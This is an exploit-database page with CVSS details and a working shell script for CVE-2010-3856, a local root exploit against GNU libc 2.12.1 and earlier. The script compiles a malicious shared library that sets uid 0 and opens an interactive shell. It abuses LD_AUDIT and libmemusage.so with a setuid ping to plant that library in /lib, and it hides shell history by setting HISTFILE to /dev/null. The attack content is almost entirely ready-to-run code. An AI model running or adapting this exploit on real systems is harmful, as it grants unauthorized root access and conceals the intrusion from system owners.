GNU libc 2.12.1 LD_AUDIT libmemusage.so Local Root

2014.11.07
Credit: ssbostan
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/sh # Exploit Title: GNU libc <= 2.12.1 LD_AUDIT Root Exploit # Date: 05/11/2014 # Exploit Author: ssbostan # Vendor Homepage: http://www.gnu.org/software/libc/ # Software Link: http://ftp.gnu.org/gnu/glibc/ # Version: <= 2.12.1 # Tested on: Ubuntu 8.04 # CVE: http://www.cvedetails.com/cve/CVE-2010-3856/ umask 0 cat > /tmp/libxpl.c << EOF __attribute__((constructor)) void init() { setuid(0); setgid(0); unlink("/lib/libxpl.so"); setenv("HISTFILE", "/dev/null", 1); execl("/bin/sh", "/bin/sh", "-i", 0); } EOF gcc -w -fPIC -shared -o /tmp/libxpl.so /tmp/libxpl.c LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/libxpl.so" ping 2>/dev/null cat /tmp/libxpl.so > /lib/libxpl.so rm -rf /tmp/libxpl.c /tmp/libxpl.so LD_AUDIT="libxpl.so" ping


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top